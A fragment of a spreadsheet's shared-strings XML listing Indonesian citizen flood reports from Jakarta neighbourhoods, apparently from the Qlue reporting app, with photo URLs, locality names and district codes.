  <si>
    <t>2dd30ef7-e51e-48f3-b728-4e750cde6c3b</t>
  </si>
  <si>
    <t>Situasi masih terkendali</t>
  </si>
  <si>
    <t>Pendem</t>
  </si>
  <si>
    <t>3b85c00f-6478-422e-93b0-40d8137690df</t>
  </si>
  <si>
    <t>qlue</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/1nth291CbgiXY8oDog_A4f6FXsGGr3ck4dHf85b6i7G1dOA5YamnBgE-aLQVuazfUfHjFFHdHPaDwV55YLhdJASRPR0Q=s480-c</t>
  </si>
  <si>
    <t>semakin malam air banjir semakin naik diwilayah pemukiman RT01/02 RW 04 Kel Cipinang Melayu, Kec. Makasar. hujan baru saja berhenti.#KaliMeluap #BanjirBandang #BanjirKiriman</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/spF4lPiYknCW87MXXpABhM3jqvNthIon1uwKc7FgJpL2F7_goLnq7PxsWHziTSreoS3Wr3xaBWfaaMZJLLAsKSNT8zUIyw=s480-c</t>
  </si>
  <si>
    <t>Banjir RT01 &amp; 02 /04 Cipinang Melayu. Hujan lebih dari 3 jam.   #KaliMeluap #BanjirKecil #BanjirBandang #BanjirKiriman</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/NKzB1AZNobHzNtx6qmmmdbmsF4Q2vAbUbxQU_bpoEWhHlR-YEmV8NiBmlUb3c92mG97odj1AzJJYmlbOD4ODo3YuxSU=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2328", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>setiap hujan sekali banjir saluran air tidak ada tolong di tindak lanjutin</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/rs57SVvc-uXvtggJKgiiwjJ4aQfGB92Bi0spfI9hkz698nM1hsjRGvNcXruAH-lIX_Dj85KU2UPUvB3GBru8NpINMGuA=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1700", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#BanjirBandang #BanjirKecil #KaliMeluap #BanjirKiriman</t>
  </si>
  <si>
    <t>Pondok Kelapa</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/4DS-E9HgSluqSwRdETP7PMIP_sEhZn2VY1-3f9mNHimvaGDwmipCXYLGfD76uC5YJfM533FcftXzrO7LVL-K6Zqu5-tN=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "95", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir di rt 10/01 kel kamal  kec kalideres jakarta barat</t>
  </si>
  <si>
    <t>Kamal</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/1Pyofgxie3EFV0LTK8T4wC5Q6Fzhs92viytHkDEvB_reXMbvgbvo_uOvSzRiPg_JhGu7BDa55xBPew6DHbF5zfIcjRO1Vw=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "353", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>evaluasi ya genangan air ini. slm peduli"</t>
  </si>
  <si>
    <t>Ancol</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/7G8hTiZa9c65gLx_5GaPK0hg-clfcwUIeYjtgNFBHuZ5VEI9d3IRMMfAFwO6o6pahJSi_z_351zVE7M_crQIGEf9pyOdWA=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2394", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>jl. durian bojong indah, hujan sebentar saja air sudah menggenang, saluran kurang lancar</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/XtjoqXi2hd_KIwW2EfYUWrkAqMhxZ-c4HQ8uuw0RxUBbknbC9zAe6H3JWxwqR_FbUGmm7gM7CwSvjrUJ-P6DHjEF-eg=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1426", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#KaliMeluap #BanjirKiriman tolong dicarikan solusi untuk banjir dipemukiman kami  karena sudah hampir 2bln kali ini sering meluap dan banjir rorotan2 jakut. tolong juga dipantau waduk perumahan jgc cakung karena sampai saat ini belum ada tanggul per"</t>
  </si>
  <si>
    <t>Rorotan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/oHcq9P3fd0VClOm94zhJ4NlZ08LdsqoRJgK_ObrGsa_G2Vr6vODYIEyPxUhPJrzalCJeTO6BrMVPrav6tisjeYXEr72_fg=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "96", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir tidak surut surut dan tidak ada penanganan dari pihak terkait untuk banjir yg surutnya berminggu minggu dan warga dampak banjir sudah kena penyakit dampak banjir, mencret, batuk pilek dan kutu air. tolong instansi terkait ditangani kami bosan banj</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/uKiQTA9UD7fEm-LfzOMGjFcqJUNOX_Dq3pfrdJqw9nNZ6hS1zevneUnDx05o-WWegAlbpU8awUKBJ_CO3GRbveSDZWs5=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2102", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>pak gubernur DKI. toloooong. baru hujan satu jam sudah banjir. ada yang salah dengan kali kinanta kelurahan Pisangan timur. mau sampai kapan seperti ini. kasiahn para manula</t>
  </si>
  <si>
    <t>Pisangan Timur</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Id0Xjpvv3OgzTE3A3XBcnPOJjIRpRjDv6HC-9CyIZeT3L3mTOASTwVSkOO1sdBWTkreKPGzyBp7dzBb1K2m-mQUkFtw=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1677", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#BanjirKecil di Komplek Jl. Rasuan Duren Sawit RT 3 RW 16 Jakarta Timur selalu terendam banjir sejak pembangunan tol becakayu, mohon perhatian walikota jakarta timur untuk memperbaiki saluran air pembuangan di komplek ini, terima kasih</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/eK0kaUoFR0NfcFMgmGabRsVVPh1KRG25zB-i40dWBtP6ZssBWHTNIWKGK3dwQZFCzwdyrc7KO9AZ10foi_F6EUTuNLZ2=s480-c</t>
  </si>
  <si>
    <t>sudah tinggi</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/IiIop4lOlnF1Wd-OAiwPFyh9fc5EMvjvAIB562rjR0LyZROAdpc_BIBvrcb3q4z1iCKi7_ugGeWqexfQv2xQfbzOIio=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2630", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>perlu pengurasan, saluran penuh sedimen setiap gerimis langsung banjir, apalagi hujan lebat</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/fOkDbjCsqYkp4nncs9yIJqSRYk6e6kXFEHJIqMiwQuKm4x5efk6bhBnCgF8qDeCrUmsEat_PPtx8GQssjY1XuGtf4tQ=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2314", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#KaliMeluap #BanjirKecil</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/s1YXwTo83J7e8A8Y0uwS4jAZhNwyI1gj3_yTMtyzRwJ79TpVbZTdeezWA73MfHsFdSv63TvjyEbVpQBBDDQzI2-f8jkbzQ=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap tolong bantuannya kali meluap sllu banjir apalagi dibarengi hujan di gg mangga rt 002/002 tegal alur kalideres</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/n-567zL1Iof5uUaQZZA7AzAzd-fi3I46KD-hy0s4ZHzVz7qbxoPW3yvVTyRdvrpSD6mAROfhS2ajDp6uVjlpgS11H-Mk=s480-c</t>
  </si>
  <si>
    <t>#BanjirKiriman tolong untuk diatasi banjir kiriman dipemukiman kami rorotan 2 jakut  tolong untuk diperhatikan."</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/PctYFvOVU2yf8CrLNRFkORvgMH4oKv27-BL_-r_nIcziVP-1Zoqmv6PyLElJqxE8MKbGxjYZBTxwZMveu4THzhC3FKVoMA=s480-c</t>
  </si>
  <si>
    <t>tolong pak gubernur. baru hujan satu jam . sudah banjir parah. ada yang salah dengan kali kinanta. kelurahan Pisangan timur.. kasihan kami dan para manula. tolong pak. toloooong</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Xqz4HFjFt_DjGteIduQ0-r8PyQv8LbL8euPphCXBi4hr1-2vNIWT-O2etJz7p2r1dAQVWFmN2Yxr1WvcO_iJDcsehy9FwQ=s480-c</t>
  </si>
  <si>
    <t>tolong pak baannjiirrr</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/nNGro4N9_Zs-Vwy7-Yvud1ANA0kMfDkJR3-4Uwc9ECr9WfvPNxDXR7U_K67-4e02bdmHvJauJeoCjLC1sBZDvXKWDjw=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2423", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>jam 11 banjir di waduk pluit masih tinggi</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/qMCq-33Z3NZH1joEASEOskaX0Aj1zGtyu5GVDopRiVa41TfxgaGKjKdQeMg7b_gLghLpa1tO5VUVtXOf3QVe9xWhMu4qNg=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2110", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>ini penyebab banjir ada sampah nyangkut</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/eH98sudO5nU-WQyUu1hNAMRzt-2bBxGGwUBq0QRw0_qKtquavT6UIFE5ZJrmEwaVlp1yE6llzupR7Onx_rjqa0h8ZQA=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "582", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Di Komplek Gunung Sahari 7C Ketinggian Sepinggang Orang Dewasa, Listrik PADAM #KaliMeluap #BanjirKiriman"</t>
  </si>
  <si>
    <t>Gunung Sahari Utara</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/8kdBo6OFjlcA3sM6866IOZbkNZ8YnevjDLma3JC92sfoaR8wzKgqa5BD3Q4T6o5CpZf7W6uKGUG2B5FtLrW41FktNsnxXA=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2241", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>BANJIR jl industri 9 no 16 rt:005 rw: 01 kel: gn sahari utara - kec: sawah besar"</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/M7DJGzVH_rUW7V-C7x5eY5SJkOvVyPSJW4i445LOhtZL5O7a9Z6HYcWwx42xK1DdvvIl3eCT-5iaTihi-o3wRiT0w2dF=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1831", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#KaliMeluap</t>
  </si>
  <si>
    <t>Dukuh</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/d64u_MS6DKHbtLDlrpMLt0w7uSd_p_MSyWStkywKTDVvgBUFwOTtjyjNCc731Ws3_tZsoVmsqcZhNw_Fo2aWkaNAtdk=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2526", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>mohon perhatian pemprov, hujan sdh stop tp air tdk ada tanda2 akan surut</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/rln5Xf9TlFa4cLXu7pzyXnGe_dDJ1J7W0wVEmdpFJncdD7mGdco_2ftrRAElQ0oPEJUiBsk4R1HUqwNI6E3tevzjlukZ=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "1840", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Butuh bantuan untuk pengungsian di RPTRA SEGAS SEGAR BERSERI Kecamatan Tanah Abang Kelurahan Karet Tengsin RT005 RW006</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/3uHQ9ge91YyKJ3715fCmhS2nYep6grqi2fiEwvm7Ffs-qaxPITolZO0TooylN6bQZRsp_1ISDn9kTsHyh5WeA8nbIgk=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1928", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>sudah ke 4 ini banjir sejak januari - februari 2020. ada apa ya? sejak 1985 tinggal disini baru kali ini banjirnya jadi langganan. tolong koordinasikan ke seluruh jajaran kelurahan kecamatan walikota dan gubernur. ini sudah bencana. masa harus ting"</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/bTaPM25dzzQBdxyRvwFpvMDnaadJ5ZdZFHQ5ESG-ygDa2ISFyoJo5HmDJlb4DfZAhGbuoerLuiy0FLJS9iMc8GHZpqEOew=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2209", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Tolong dinas Bina Marga... banjir sudah 8 jam belum surut karena jalan rendah lokasi jalan dukuh rt 06 rw 08 kelurahan rawa badak selatan. koja</t>
  </si>
  <si>
    <t>Tugu Selatan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/dp8HiBs7XSEnwrKRldKqfYkG0Gg1PDkK1HIyjCvqiMhrlJ1-Gb7inintQBWsJkKMUg2__ODfDRlZTegG_qN5l3oAko1GUQ=s480-c</t>
  </si>
  <si>
    <t>perempatan cempaka mas</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/zjeODon33gqK5VQxE0-1lUswE_1UytgfpIwRHP1U-HzBUqVvZQk-FU82Q3INinS2k4VWomA281KPOOOhR1SO6EqKXRk=s480-c</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/lqDDeV8s5Rn7MDo8IHknOy-5O_sewQENG4Ns6KUrHPtwcYt--VqgOsh2i397GPLk6q3kmQ9cjMYL08Tle_A0zXYyVJv8=s480-c</t>
  </si>
  <si>
    <t>kodamar banjir</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/faBZupa9LR04wmBPFOtLfxhBN64tkYMuWttT88zVSDuM6JNZEcVPGcVl7vOekyg_zLBJgJXO51-dCzCkCbP1M3IujS8i=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "544", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>mohon  bantuan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/RmuabQQtS8Pl6u5eSRFTIsuj6dvu_30F21uHgOj1RDBrfMPesXq-4Rcj5yxfT3br3YOmY5nr-F14IDM5Trmq7IiipAvL=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "700", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Rumah dah kayak wahana waterboom #BanjirKecil #KaliMeluap</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/MObQLEec6DoP5rB51Hd2tHemirXEUCrC66rVYZB7EiMqdfIUn6YeQ4QPt15-hYtbnddX3xLhkLzqTi2g3enFGMHoT6aDnQ=s480-c</t>
  </si>
  <si>
    <t>depan Mall of Indonesia</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/o26wJoZnAIkuoCULbctCsCLi5JGT4i6mm-5qfTzL1-AjHx3dsJQGSb9NRKHRhgh4UBwgLqAAgA8iOXhLG7Blt4difYs=s480-c</t>
  </si>
  <si>
    <t>banjir lagi aja, wilayah Taman Harapan Indah, jalan Hanoman X, Jak-Bar</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/kL_8SBTZPbp52Pkpx6BeAZyZr8z5tiGZM300NMrcU8eZL45_PW2YjBbA3Uz5xwlQAl9Owr9FUMaulGLfGEYnsoDH-Nc=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2139", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Minggu banjir tp cepat surut... kali ini lambat Mau cari sarapan pun bingung kekepung banjir"</t>
  </si>
  <si>
    <t>Rawamangun</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/ehsM-biMrreuoykejlOL7SaMub4jOpRB7PuJYw4f1KMApE1NS7pURDPlSssCBGs5zMyORbgX54-S1X-_YYeZQmKogb-5=s480-c</t>
  </si>
  <si>
    <t>RT 10/07</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/FfaGIeoUIRIjylY32SShT83pkY6H0uAlj6ae90U-Q_wZze6oejMVrGWvUxOv4514s_o5TOVMS6J-WkWkiL2NU7OzKkRI_A=s480-c</t>
  </si>
  <si>
    <t>Banjir di RT01 &amp; 02/RW04 Jl. H Amsir Cipinang Melayu Makin tinggi mohon bantuan team evakuasi Karena sampai dengan saat ini belum ada Warga tidak bisa mengevakuais dirinya sendiri Karena ketinggian air #KaliMeluap #BanjirBandang #BanjirKiriman</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/nWUkR2zWffkFy5FIH8iQVUeZdDxmrYMTDJXa2qIaZ8AIpjd32s0vawdQlV_rXKWAycnUdnXZO95_tMhv_PH0DBkpaLD4XQ=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2197", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir di kelapa gading seminggu 2x,  solusi yg didapat tidak ada masih ngeles curah hujan tinggi? Duh gusti mengapa kau berikan pemimpin yg tdk amanah kepada kami warga jkt</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/K5ylruQ6kmlr0qc8knHkHxgq9mE9PC0gtmSscVvxN70DLBuTOIhllk8Jw8ws-CfhZ7iH1k-YaZ5oCskIb0Xx_0V1nvI8=s480-c</t>
  </si>
  <si>
    <t>Pemerataan fasilitas olah raga air dan wisata bahari?</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/jLKXOsqeF_wUDlEK0vBy88BndJptxgLfLvCbajfN8RxI8gO8JBFB9D5nmfp6XqHKNfKDS8bWJQ2gV9LB0eNKs5k2AGqt=s480-c</t>
  </si>
  <si>
    <t>Banjir Lagi , Di Jl.Rawa Bebek Kel.Kamal Kec.Kalideres</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/LlzyIY4QhzXRF3ucHvKnu8KG59Tq-p3PeFRprrAu43e7QUgVgd9nq21r2OCLgIDpkKZJOYh6MRDXzuXPeTALSphO19I=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "472", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>toll Wiyoto Wiyono</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Tz4lj9oN29DSSU1snyfs3CssYNtNSrzpEOvW6d292141XNeod3uqeNkmgOFUJIztLPr5jLx8Ze5d9fCx46XibT_zICD88w=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "263", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#BanjirKecil</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/8QDmwJ3UTEYWisY0V7iw3JSrlv8v_LO0Y-1U7vmDK9_hUKTc-l-jp3v6K6iy7sZyW13U3kzO0C5iTV4HE5WhHg5mI7ociA=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "261", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>udh berkali2 ga keitung</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/bub81M-rmMgHpUqmGOqxgRu7BcQnwMMQajpVzkzhqBwwaxqaUqb1LiWRRppM6SXGxwNt3cSKHWpwjnqn8eDfSKk9doycDw=s480-c</t>
  </si>
  <si>
    <t>banjir parah.. tolong dibantu dibuka saluran air dan pompa</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/ge7DNG9EDH_QgJB9rW7cqhKNxK1seQFx2Emq_WqMlvveiLWYQIuczydSPDfCzrB6mTV_ChdHkMBPSiOgKu8gK-7MDF8F=s480-c</t>
  </si>
  <si>
    <t>kalau sepanjang kali yg samping taman Dukuh ditinggikan minimal 1 mtr lagi air tdk akan taman ..</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/4irr626zt4XrTEY6B2CO5L7KvTbJakuRuHTl8tQJzTYMwyQnJmHMqsmfduuGWkiPHJgwonjek4ugmzHasZAuzCQIE7U=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "668", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/qW0YBlzUMlII4BRmF47PS6Gz9S_ErhanyZcQP2V4IcBAmSlUh0BiI-zXZF8JpfIzBD5qCuMcJz_6FnXtPYpXenqSpr5HHQ=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1162", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>tolong dibantu warga pinggir kalii banjir.. kasihaan anak anak</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/oZdP6riYQxNy6oIEXdrAUn9ti8eKzXnUTn9ca4XR1cWVdnuzbvGHqVpmoERRZWRJmpU78yva9odSb2ziV6YfKUfrWPU=s480-c</t>
  </si>
  <si>
    <t>banjir sampai paha</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/pNgmS413ihflEBzk3Yb9B9K9efLLPiK46ZjpAxDLccSVel2MbGNck2HHx3pv-zVtmft7OjGZJyA0hFtHm4ZCP4EjsTf5=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2281", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>wajah baru jakarta... terima kasih kepada para penguasa jakarta....</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Ps9pU5VEu1Ve27Oy_p6Ayc4flhylg_q3WChj99IUcff8VFDTK3NJmyvBNnhtTGlAzAMM0e0Vtgwko9DQdPWmMTZht7Yr=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "14", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#KaliMeluap sebelah stasiun kereta Grogol Banjir. tinggi 40cm</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/qRE9dI62n38GdX2Va2gMS7T6BMAF52EUKCNr_ar5fG7F_Qq0RoDAgBCDeOPxH6-EJdNfGQ_32FjPYdFcFKJK3YR43VI=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "488", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>setiap hujan pasti banjir</t>
  </si>
  <si>
    <t>Rawa Sari</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/8dzmSXx8fQvBu1_wQSNnHdS08ElkM7Xg5jhPY8Z_eXVUr4ij1778KFlFXWyVmsei6xb0-tUh6ppj-SbeA6Sh38gDXsbvqA=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap banjir di Perumahan Taman Semanan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/0dIvyV5kq_cz1rtfiyFxD7vnN2sOlkcpptTN_VAC22BM0VzX0vMuseXwiXVkUnaoganiqFqpiwu2zhBLX3dvdHJkTSE9HQ=s480-c</t>
  </si>
  <si>
    <t>banjir</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/_HPy4CXka0fIRLaNxM8GV--5Q7YAnHjK9oRkm-Pe4FfMwlX137ut6kpgRHiIk-MQsMZ51zRPdDCuY4G7ULbgimDRka1Q=s480-c</t>
  </si>
  <si>
    <t>@bnip @banjirjakarta @jelambar</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/F8ls-KPktBAY3Hz_lmuYp4Lcik6X2LG2fSoe05mX9dFX1aQbUD7X41ADWrC6XzZAa5ub__ZYtCH1B9l3JxlnsiCOlJ-L=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1794", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jln Swadaya 3 Rawabunga banjir lagi. tolong saluran air di by pass dibuka lagi. karena sampai sekarang tertutup pembangunan sehingga setiap hujan warga selalu waswas akan banjir. karena air dari jalan raya pun tumpah ruah ke rumah warfa</t>
  </si>
  <si>
    <t>Rawa Bunga</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/6XsCZiBClIobfzR9EGjXi6o3bvziSLU_HgQMfLrbuk4A7shsFlRJLOi_NKfOX5-VdPqs1euICmzvR8mUnXLzwuGXPGkKyQ=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1459", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#BanjirKecil gak ada solusi dan tindak lanjut setiap hujan tetep aja banjir, bu lurah penggilingan pak camat cakung pak walikota Jakarta timur, warga butuh solusi jgn diam aja..</t>
  </si>
  <si>
    <t>Penggilingan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/SR5bEX95RS1u_PuAGV-bnvgv1Rd6fESimPQmXxEhJ_FS76qy8yumnkbBYTcfw-AMO-YLpRzH_W3E3Kq30Xdduoosplvf=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "867", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>masih belum ada solusi....jl. nusa indah dalam RT 12/02</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/j2g_3XCy6xxfTuEh-H3ndRS2veDQyeJmizgFAugnekd43CXR604VEbESMUqZ4stDARCnAxgR89c08QW5OWsh-bZUDaG-=s480-c</t>
  </si>
  <si>
    <t>stasiun Rawa Buaya #KaliMeluap tinggi selutut orang dewasa</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/IOO1KjTEbcQFg7EXiTPMZsL_hj073OvA_uweeArg2dnju2Y0AaZO5u1TO0QcxZCYtW29i1Q8pd-mwpT7fMXSicOSO_5n=s480-c</t>
  </si>
  <si>
    <t>bajir</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/DsLgO0w5hF_jgZvKjqoYdqonCdxxxYIciN0IAJos0vfvCwZ7SIPkhvLi_2XAWljYhWVe__AOAQNH2NCwrTUpCD7TWeg8Ow=s480-c</t>
  </si>
  <si>
    <t>#banjir bekasi timur aren jaya rw 18 jalanan sudah 50cm dan sudah masuk kedalam rumah 10cm</t>
  </si>
  <si>
    <t>Aren Jaya</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/2sdHyB2_Buwr6MjZIwQarQ37w3aNyeazWsX9yBVsGi_q9gLOCwIYhV8rgxJySPyoKYwQ0FlL4UQLYhZWoUrF1rT7bMboag=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1654", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir di iprija,Ciracas. ga bisa ketembus,bolos deh</t>
  </si>
  <si>
    <t>Kelapa Dua Wetan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/GW47qr3BSN3nL7dlGa5h2Y84oPOV4B1Z5sVdfxSxV-5KPu4pQzcp1A0EyuY6Xr74JpCpHQ-p8NfQdxLDOW5s2IPq-aMT=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1269", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#BanjirKecil  aliran got mampat jd air kluar menggenangi jalan kalau hujan lebat seperti sekarang</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/rdaJeUtmf0aZ4jDK-I_J2c7vQvw2QahbkYCyCNWt6yVEie1VYSXKWqpFD6iKzb1fZ78ZTaOfRfqnl0yE0MH3oY-wA9Gr=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "410", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjirr ini</t>
  </si>
  <si>
    <t>Jembatan Lima</t>
  </si>
  <si>
    <t>Tambora</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Ql-Fjk0v1ospBZNfZ_de6k-TpPoeEY6YHNagLEuDttK0vgYm1mXGUCBT5-n5p7Ffz-yG5d6HXS5PDW-VyrdZJCaKz55o=s480-c</t>
  </si>
  <si>
    <t>pak.. tolong warga jl. cimerak selatan duren sawit. rumah warga sdh kebanjiran. gorong2 di depan sekolah kinderfield dan sd negri tidak berfungsi. sampah-sampah warung liar sebelah sekolah kinderfield, sepertinya menutupi menyumbat gorong2.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Ly5TLmpaGO8fyG9hSNGLkInwBMSbcx5YWWa8VjFsEo8oV_n44B6z5gOr_i1ZUMQtPOMXYJkejGCqNpxLeGguIZJT2EnM=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1748", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#sampahbasah  ketika banjir banyak warga yg sembarangan buang sampah</t>
  </si>
  <si>
    <t>Cipinang Besar Selata</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/02DVd61t4gJ6kdPW9ArbrAfke3wm93D40juJsqL7elMV01Vi4n5bwmvcfJ4zLkPN_lWId3mh34DoO0gcoIVLTHA0koW1=s480-c</t>
  </si>
  <si>
